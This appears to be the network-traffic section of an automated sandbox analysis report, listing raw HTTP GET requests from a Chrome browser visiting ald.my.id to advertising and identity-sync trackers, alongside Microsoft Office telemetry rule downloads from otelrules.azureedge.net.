Source: global trafficHTTP traffic detected: GET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: rlas3=cFd4eRXc6kRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=
Source: global trafficHTTP traffic detected: GET /?partner=109&icm&cver&gdpr=0&smartmap=1&redirect=tags.bluekai.com%2Fsite%2F33141%3F%26id%3D%25m HTTP/1.1Host: pixel.onaudience.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookie=10907476198d4755; done_redirects147=1; done_redirects109=1
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /f/AGSKWxUmsMqtSSePcx4h11wfZV5rxyGVnJAk3oRbeOgKg7Io4obCBjjBWNKhsHkvPsx3lQdQWEDqC1eiMud2YT43HJ5HwRq_9qwIjdhbtz3yndJAe8FOk_FaXhRHtllCX0s7Nhk82CqRrQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTU3LDYyNjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt/c/16311/sync.min.js HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1Host: idsync.rlcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=oidxsW5ixWRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
Source: global trafficHTTP traffic detected: GET /f/AGSKWxX5zRX28eITzjJdCpLjeEeUzny5Gtt2HV7BffKc_f32tqAyqI-vwhlcT3j6MPwthxeOORbGEFlfHog780WZrbkKPCX_VEvso6NYDKW9wlcY2qsAZbhNI71RowP_G9I8NVVHim-fGLp3GD0qarIAmwEyoDTZ7JnQ7VvvpvSNA_P7mst2xnB2o5NQK7q9/_/ad-background./inlinetextads?_gads_footer./adgear2-/ads_top_ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /utsync.ashx?eid=50131&et=13&cid=lr&fp=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&gdpr=0&gdpr_consent=&return=https%3A%2F%2Fidsync.rlcdn.com%2F395886.gif%3Fpartner_uid%3D%5BPersonID%5D HTTP/1.1Host: ml314.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /386076.gif?partner_uid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&gdpr=0&gdpr_consent= HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=oidxsW5ixWRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=1h1y1a7&ttd_tpi=1&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; TDCPM=CAEYBSABKAIyCwjSn7LK4o62PRAFOAE.
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pixel?pid=1mpb5m0&t=gif&gdpr=0&gdpr_consent= HTTP/1.1Host: ps.eyeota.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /395886.gif?partner_uid=3647697138334302238 HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=7skOM0+eLylT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
Source: global trafficHTTP traffic detected: GET /6/map HTTP/1.1Host: bcp.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_dc=1; _cc_id=d623ac854d7c5259de086b3e7c50fd78
Source: global trafficHTTP traffic detected: GET /f/AGSKWxX5zRX28eITzjJdCpLjeEeUzny5Gtt2HV7BffKc_f32tqAyqI-vwhlcT3j6MPwthxeOORbGEFlfHog780WZrbkKPCX_VEvso6NYDKW9wlcY2qsAZbhNI71RowP_G9I8NVVHim-fGLp3GD0qarIAmwEyoDTZ7JnQ7VvvpvSNA_P7mst2xnB2o5NQK7q9/_/ad-background./inlinetextads?_gads_footer./adgear2-/ads_top_ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /f/AGSKWxVA2AfsAy6bl_orgjLa-ktICoGbho28bTgmHZldatP8mM9GwgjDSaR33p-zQ4Z3psf-T6y01RyIJMRcXpsGke0ygK7nxYIumXDTYW3tVyk60W-PkqmH1keGLWmdi96iIP5_4zM-Fg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYwLDQ3NzAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vYWxkLm15LmlkLyIsbnVsbCxbWzgsInRhQmdHdlJRQzIwIl0sWzksImVuLVVTIl0sWzE4LCJbW1swXV1dIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /pixel/bounce/?pid=1mpb5m0&t=gif&gdpr=0&gdpr_consent= HTTP/1.1Host: ps.eyeota.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: mako_uid=1928a4d19e7-64f90000010f4043; SERVERID=16451~DM
Source: global trafficHTTP traffic detected: GET /csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082 HTTP/1.1Host: ml314.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pi=3647697138334302238
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /f/AGSKWxX0-0x5HivWeZLchiQ-nD7g2ILscryuZP_ALv6f3ICLAOJ-avY8-qKfwAdUk5OjIfQJNpUfSt6dcMucORzNFPmm-eBr07hAP4N-Gd6Dh2lmgPI8mzM7UY1l8KzcVJqhr_oszQslaA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYxLDQ0OTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /f/AGSKWxVA2AfsAy6bl_orgjLa-ktICoGbho28bTgmHZldatP8mM9GwgjDSaR33p-zQ4Z3psf-T6y01RyIJMRcXpsGke0ygK7nxYIumXDTYW3tVyk60W-PkqmH1keGLWmdi96iIP5_4zM-Fg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYwLDQ3NzAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vYWxkLm15LmlkLyIsbnVsbCxbWzgsInRhQmdHdlJRQzIwIl0sWzksImVuLVVTIl0sWzE4LCJbW1swXV1dIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082 HTTP/1.1Host: ml314.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pi=3647697138334302238
Source: global trafficHTTP traffic detected: GET /ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.sharethis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t.sharethis.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /f/AGSKWxX0-0x5HivWeZLchiQ-nD7g2ILscryuZP_ALv6f3ICLAOJ-avY8-qKfwAdUk5OjIfQJNpUfSt6dcMucORzNFPmm-eBr07hAP4N-Gd6Dh2lmgPI8mzM7UY1l8KzcVJqhr_oszQslaA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYxLDQ0OTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: my7recovery.blogspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt/c/3825/optimus_rules.json HTTP/1.1Host: tags.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ald.my.idSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
